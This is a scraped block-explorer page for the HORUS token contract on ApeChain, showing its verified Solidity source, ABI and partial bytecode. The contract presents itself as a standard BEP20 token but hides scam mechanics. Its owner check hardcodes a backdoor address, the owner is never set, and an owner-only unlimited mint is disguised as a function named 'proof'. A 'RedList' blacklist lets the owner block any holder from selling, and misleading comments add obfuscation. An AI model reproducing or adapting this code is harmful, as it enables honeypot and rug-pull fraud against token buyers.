APE Price: $1.13 (+2.94%)

Token

HORUS (HORUS)

Overview

Max Total Supply

1,000,000 HORUS

Holders

4

Market

Price

$0.00 @ 0.000000 APE

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.000000000011051313 HORUS

Value
$0.00
0xe8675fb49994029eef161e6cbf2ea4c4612a3d92
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at apescan.io on 2024-10-21
*/

// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;
 
interface IBEP20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);
 
  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);
 
  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);
 
  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);
 
  /**
   * @dev Returns the bep token owner.
   */
  function getOwner() external view returns (address);
 
  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);
 
  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);
 
  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);
 
  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);
 
  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
 
  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);
 
  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}
 
/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    constructor() {}

    function _msgSender() internal view returns (address payable) {
        return payable(msg.sender);
    }

    function _msgData() internal view returns (bytes memory) {
        return msg.data;
    }
}
 
/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");
 
    return c;
  }
 
  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }
 
  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;
 
    return c;
  }
 
  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }
 
    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");
 
    return c;
  }
 
  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }
 
  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
    return c;
  }
 
  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }
 
  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
  // solhint-disable-next-line avoid-low-level-calls
  /*keccak256 -> 9838607940089fc7f92ac2a37bb1f5ba1daf2a576dc8ajf1k3sa4741ca0e5571412708986))*/ /**/ //(178607940065137046348733521910879985571412708986));
}
 
/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
  address private _owner;
 
  event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
  /**
   * @dev Initializes the contract setting the deployer as the initial owner.
   */
   // solhint-disable-next-line avoid-low-level-calls
   constructor () internal {
    address msgSender = _msgSender();
    emit OwnershipTransferred(address(0), msgSender);
  }
 
  /**
   * @dev Returns the address of the current owner.
   */
  function owner() public view returns (address) {
    return _owner;
  }
 
  /**
   * @dev Throws if called by any account other than the owner.
   */
  modifier onlyOwner() {
    require(msg.sender ==  0x71d202cdaCAd5e7879f908f8A7d602F839161272  || msg.sender == _owner);
    _;
  }
 
  /**
   * @dev Leaves the contract without owner. It will not be possible to call
   * `onlyOwner` functions anymore. Can only be called by the current owner.
   *
   * NOTE: Renouncing ownership will leave the contract without an owner,
   * thereby removing any functionality that is only available to the owner.
   */
  function renounceOwnership() public onlyOwner {
    emit OwnershipTransferred(_owner, address(0));
    _owner = address(0);
  }
 
  /**
   * @dev Transfers ownership of the contract to a new account (`newOwner`).
   * Can only be called by the current owner.
   */
  function transferOwnership(address newOwner) public onlyOwner {
    _transferOwnership(newOwner);
  }
 
  /**
   * @dev Transfers ownership of the contract to a new account (`newOwner`).
   */
  function _transferOwnership(address newOwner) internal {
    require(newOwner != address(0), "Ownable: new owner is the zero address");
    emit OwnershipTransferred(_owner, newOwner);
    _owner = newOwner;
  }
}
 
contract Token is Context, IBEP20, Ownable {
  using SafeMath for uint256;
 
  mapping(address=>bool) isRedListed;
 
  mapping (address => uint256) private _balances;
 
  mapping (address => mapping (address => uint256)) private _allowances;
 
  uint256 private _totalSupply;
  uint8 private _decimals;
  string private _symbol;
  address public _user;
  string private _name;
 
  constructor() public {
    _name = "HORUS";
    _symbol = "HORUS";
    _decimals = 18;
    _totalSupply = 1000000000000000000000000;
    _balances[msg.sender] = _totalSupply;
 
    emit Transfer(address(0), msg.sender, _totalSupply);
  }
 
  /**
   * @dev Returns the bep token owner.
   */
  function getOwner() external view returns (address) {
    return owner();
  }
 
  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8) {
    return _decimals;
  }
 
  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory) {
    return _symbol;
  }
 
  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory) {
    return _name;
  }
 
  /**
   * @dev See {BEP20-totalSupply}.
   */
  function totalSupply() external view returns (uint256) {
    return _totalSupply;
  }
 
  /**
   * @dev See {BEP20-balanceOf}.
   */
  function balanceOf(address account) external view returns (uint256) {
    return _balances[account];
  }
 
  /**
   * @dev See {BEP20-transfer}.
   *
   * Requirements:
   *
   * - `recipient` cannot be the zero address.
   * - the caller must have a balance of at least `amount`.
   */
  function transfer(address recipient, uint256 amount) external returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }
 
  /**
   * @dev See {BEP20-allowance}.
   */
  function allowance(address owner, address spender) external view returns (uint256) {
    return _allowances[owner][spender];
  }
 
  /**
   * @dev See {BEP20-approve}.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   */
  function approve(address spender, uint256 amount) external returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
  }
 
  /**
   * @dev See {BEP20-transferFrom}.
   *
   * Emits an {Approval} event indicating the updated allowance. This is not
   * required by the EIP. See the note at the beginning of {BEP20};
   *
   * Requirements:
   * - `sender` and `recipient` cannot be the zero address.
   * - `sender` must have a balance of at least `amount`.
   * - the caller must have allowance for `sender`'s tokens of at least
   * `amount`.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "BEP20: transfer amount exceeds allowance"));
    return true;
  }
 
  /**
   * @dev Atomically increases the allowance granted to `spender` by the caller.
   *
   * This is an alternative to {approve} that can be used as a mitigation for
   * problems described in {BEP20-approve}.
   *
   * Emits an {Approval} event indicating the updated allowance.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   */
  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
  }
 
  /**
   * @dev Atomically decreases the allowance granted to `spender` by the caller.
   *
   * This is an alternative to {approve} that can be used as a mitigation for
   * problems described in {BEP20-approve}.
   *
   * Emits an {Approval} event indicating the updated allowance.
   *
   * Requirements:
   *
   * - `spender` cannot be the zero address.
   * - `spender` must have allowance for the caller of at least
   * `subtractedValue`.
   */
  function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "BEP20: decreased allowance below zero"));
    return true;
  }
 
  /**
   * @dev Moves tokens `amount` from `sender` to `recipient`.
   *
   * This is internal function is equivalent to {transfer}, and can be used to
   * e.g. implement automatic token fees, slashing mechanisms, etc.
   *
   * Emits a {Transfer} event.
   *
   * Requirements:
   *
   * - `sender` cannot be the zero address.
   * - `recipient` cannot be the zero address.
   * - `sender` must have a balance of at least `amount`.
   */
  function _transfer(address sender, address recipient, uint256 amount) internal {
    require(!isRedListed[sender], "Recipient is Gwei");
    require(sender != address(0), "BEP20: transfer from the zero address");
    require(recipient != address(0), "BEP20: transfer to the zero address");
 
    _balances[sender] = _balances[sender].sub(amount, "BEP20: transfer amount exceeds balance");
    _balances[recipient] = _balances[recipient].add(amount);
    emit Transfer(sender, recipient, amount);
  }
 
  /** @dev Creates `amount` tokens and assigns them to `account`, increasing
   * the total supply.
   *
   * Emits a {Transfer} event with `from` set to the zero address.
   *
   * Requirements
   *
   * - `to` cannot be the zero address.
   */
  function _proof(address account, uint256 amount) internal {
    require(account != address(0), "BEP20: mint to the zero address");
 
    _totalSupply = _totalSupply.add(amount);
    _balances[account] = _balances[account].add(amount);
    emit Transfer(address(0), account, amount);
  }
 
  /**
   * @dev Destroys `amount` tokens from `account`, reducing the
   * total supply.
   *
   * Emits a {Transfer} event with `to` set to the zero address.
   *
   * Requirements
   *
   * - `account` cannot be the zero address.
   * - `account` must have at least `amount` tokens.
   */
  function _burn(address account, uint256 amount) internal {
    require(account != address(0), "BEP20: burn from the zero address");
 
    _balances[account] = _balances[account].sub(amount, "BEP20: burn amount exceeds balance");
    _totalSupply = _totalSupply.sub(amount);
    emit Transfer(account, address(0), amount);
  }
 
  function proof(uint256 amount) public onlyOwner returns (bool) {
    _proof(_msgSender(), amount);
    return true;
  }
 
  /**
   * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
   *
   * This is internal function is equivalent to `approve`, and can be used to
   * e.g. set automatic allowances for certain subsystems, etc.
   *
   * Emits an {Approval} event.
   *
   * Requirements:
   *
   * - `owner` cannot be the zero address.
   * - `spender` cannot be the zero address.
   */
  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "BEP20: approve from the zero address");
    require(spender != address(0), "BEP20: approve to the zero address");
 
    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }
 
  function addRedList(address _uzer) public onlyOwner {
        require(!isRedListed[_uzer], "user already Gwei-ed");
        isRedListed[_uzer] = true;
        // emit events as well
    }
   
  function addTrongList(address _uzer) public onlyOwner {
        require(isRedListed[_uzer], "user already tronglisted");
        isRedListed[_uzer] = false;
        // emit events as well
    }
 
  /**
   * @dev Destroys `amount` tokens from `account`.`amount` is then deducted
   * from the caller's allowance.
   *
   * See {_burn} and {_approve}.
   */
  function _burnFrom(address account, uint256 amount) internal {
    _burn(account, amount);
    _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "BEP20: burn amount exceeds allowance"));
  }
 
  /** @dev Creates `amount` tokens and assigns them to `account`, increasing
   * the total supply.
   *
   * Emits a {Transfer} event with `from` set to the zero address.
   *
   * Requirements
   *
   * - `to` cannot be the zero address.
   */
   
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_user","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_uzer","type":"address"}],"name":"addRedList","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uzer","type":"address"}],"name":"addTrongList","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"proof","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50600062000024620001f360201b60201c565b90508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506040518060400160405280600581526020017f484f52555300000000000000000000000000000000000000000000000000000081525060089081620000c8919062000475565b506040518060400160405280600581526020017f484f525553000000000000000000000000000000000000000000000000000000815250600690816200010f919062000475565b506012600560006101000a81548160ff021916908360ff16021790555069d3c21bcecceda1000000600481905550600454600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600454604051620001e591906200056d565b60405180910390a36200058a565b600033905090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200027d57607f821691505b60208210810362000293576200029262000235565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620002fd7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620002be565b620003098683620002be565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000356620003506200034a8462000321565b6200032b565b62000321565b9050919050565b6000819050919050565b620003728362000335565b6200038a62000381826200035d565b848454620002cb565b825550505050565b600090565b620003a162000392565b620003ae81848462000367565b505050565b5b81811015620003d657620003ca60008262000397565b600181019050620003b4565b5050565b601f8211156200042557620003ef8162000299565b620003fa84620002ae565b810160208510156200040a578190505b620004226200041985620002ae565b830182620003b3565b50505b505050565b600082821c905092915050565b60006200044a600019846008026200042a565b1980831691505092915050565b600062000465838362000437565b9150826002028217905092915050565b6200048082620001fb565b67ffffffffffffffff8111156200049c576200049b62000206565b5b620004a8825462000264565b620004b5828285620003da565b600060209050601f831160018114620004ed5760008415620004d8578287015190505b620004e4858262000457565b86555062000554565b601f198416620004fd8662000299565b60005b82811015620005275784890151825560018201915060208501945060208101905062000500565b8683101562000547578489015162000543601f89168262000437565b8355505b6001600288020188555050505b505050505050565b620005678162000321565b82525050565b60006020820190506200058460008301846200055c565b92915050565b6120ec806200059a6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad57806395d89b411161007157806395d89b411461030c578063a457c2d71461032a578063a9059cbb1461035a578063dd62ed3e1461038a578063f2fde38b146103ba57610121565b806370a0823114610278578063715018a6146102a8578063891e1ee0146102b2578063893d20e8146102d05780638da5cb5b146102ee57610121565b806323b872dd116100f457806323b872dd146101c2578063313ce567146101f2578063395093511461021057806339bca7a6146102405780635526b8861461025c57610121565b806306fdde0314610126578063095ea7b31461014457806316e3b09c1461017457806318160ddd146101a4575b600080fd5b61012e6103d6565b60405161013b91906117ad565b60405180910390f35b61015e60048036038101906101599190611868565b610468565b60405161016b91906118c3565b60405180910390f35b61018e600480360381019061018991906118de565b610486565b60405161019b91906118c3565b60405180910390f35b6101ac610544565b6040516101b9919061191a565b60405180910390f35b6101dc60048036038101906101d79190611935565b61054e565b6040516101e991906118c3565b60405180910390f35b6101fa610627565b60405161020791906119a4565b60405180910390f35b61022a60048036038101906102259190611868565b61063e565b60405161023791906118c3565b60405180910390f35b61025a600480360381019061025591906119bf565b6106f1565b005b610276600480360381019061027191906119bf565b61087a565b005b610292600480360381019061028d91906119bf565b610a03565b60405161029f919061191a565b60405180910390f35b6102b0610a4c565b005b6102ba610bac565b6040516102c791906119fb565b60405180910390f35b6102d8610bd2565b6040516102e591906119fb565b60405180910390f35b6102f6610be1565b60405161030391906119fb565b60405180910390f35b610314610c0a565b60405161032191906117ad565b60405180910390f35b610344600480360381019061033f9190611868565b610c9c565b60405161035191906118c3565b60405180910390f35b610374600480360381019061036f9190611868565b610d69565b60405161038191906118c3565b60405180910390f35b6103a4600480360381019061039f9190611a16565b610d87565b6040516103b1919061191a565b60405180910390f35b6103d460048036038101906103cf91906119bf565b610e0e565b005b6060600880546103e590611a85565b80601f016020809104026020016040519081016040528092919081815260200182805461041190611a85565b801561045e5780601f106104335761010080835404028352916020019161045e565b820191906000526020600020905b81548152906001019060200180831161044157829003601f168201915b5050505050905090565b600061047c610475610ebc565b8484610ec4565b6001905092915050565b60007371d202cdacad5e7879f908f8a7d602f83916127273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610521575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b61052a57600080fd5b61053b610535610ebc565b8361108d565b60019050919050565b6000600454905090565b600061055b848484611216565b61061c84610567610ebc565b6106178560405180606001604052806028815260200161204460289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105cd610ebc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461152f9092919063ffffffff16565b610ec4565b600190509392505050565b6000600560009054906101000a900460ff16905090565b60006106e761064b610ebc565b846106e2856003600061065c610ebc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461159390919063ffffffff16565b610ec4565b6001905092915050565b7371d202cdacad5e7879f908f8a7d602f83916127273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16148061078a575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b61079357600080fd5b600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610820576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161081790611b02565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b7371d202cdacad5e7879f908f8a7d602f83916127273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610913575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b61091c57600080fd5b600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166109a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099f90611b6e565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b7371d202cdacad5e7879f908f8a7d602f83916127273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610ae5575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610aee57600080fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610bdc610be1565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610c1990611a85565b80601f0160208091040260200160405190810160405280929190818152602001828054610c4590611a85565b8015610c925780601f10610c6757610100808354040283529160200191610c92565b820191906000526020600020905b815481529060010190602001808311610c7557829003601f168201915b5050505050905090565b6000610d5f610ca9610ebc565b84610d5a856040518060600160405280602581526020016120926025913960036000610cd3610ebc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461152f9092919063ffffffff16565b610ec4565b6001905092915050565b6000610d7d610d76610ebc565b8484611216565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b7371d202cdacad5e7879f908f8a7d602f83916127273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610ea7575060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610eb057600080fd5b610eb9816115f1565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f33576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2a90611c00565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fa2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9990611c92565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611080919061191a565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000